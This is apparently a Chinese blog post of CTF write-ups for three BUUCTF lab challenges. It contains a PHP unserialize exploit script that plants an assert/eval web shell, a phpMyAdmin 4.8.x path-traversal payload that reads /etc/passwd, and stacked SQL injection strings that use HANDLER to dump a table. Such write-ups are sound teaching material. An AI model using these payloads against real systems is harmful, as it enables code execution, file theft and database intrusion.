BUUCTF(14)

XINO
264 阅读2分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第13天,点击查看活动详情

[NPUCTF2020]ReadlezPHP F12看见源码

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
@$ppp = unserialize($_GET["data"]);

__destruct()魔术方法中

b包含了a

利用assert()函数

assert 判断一个表达式是否成立

assert()可以将整个字符串参数当作php参数执行。

所以构造木马

assert(eval($_POST[penson]);)

我们可以写个解题脚本

<?php
error_reporting(1);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}


$test = new HelloPhp();
$test->b = 'assert';
$test->a = 'eval($_POST[penson]);';


echo urlencode(serialize($test));




?>
  1. 需要我们输入data参数,之后将data参数反序列化执行
  2. HelloPhp这个类的析构函数会执行echo $b($a)代码,当b=system,a=phpinfo()时,会执行函数查看到phpinfo界面
  3. 可以构建HelloPhp的序列化字符串,data传入时反序列化就会执行析构函数
  4. 获取HelloPhp类的序列化字符串:这里屏蔽了system,改用了assert
<?php  


class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
}


$a = serialize(new HelloPhp);
echo $a;
?> 
结果:O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
 http://e55cd88e-5579-49c9-b87c-ee1670605995.node4.buuoj.cn:81/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

[GWCTF 2019]我有一个数据库

考点是phpmyadmin

进入该页面

phpmyadmin4.8.0-4.8.1存在文件包含漏洞

使用网上的payload直接打

先测试能不能用该数据库

payload

?target=db_datadict.php%253f/../../../../../../../../etc/passwd
发现有回显后我们改成flag
http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

[GYCTF2020]Blacklist

考点堆叠注入

结合之前做过的题首先看数据库

1';show database;#

看表

1';show tables;#

发现关键信息后继续#FlagHere

1';show columns from `FlagHere`;

之后发现flag

至于怎末读取

这里我们用到handler这个东西

 

HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
avatar
文章
阅读
粉丝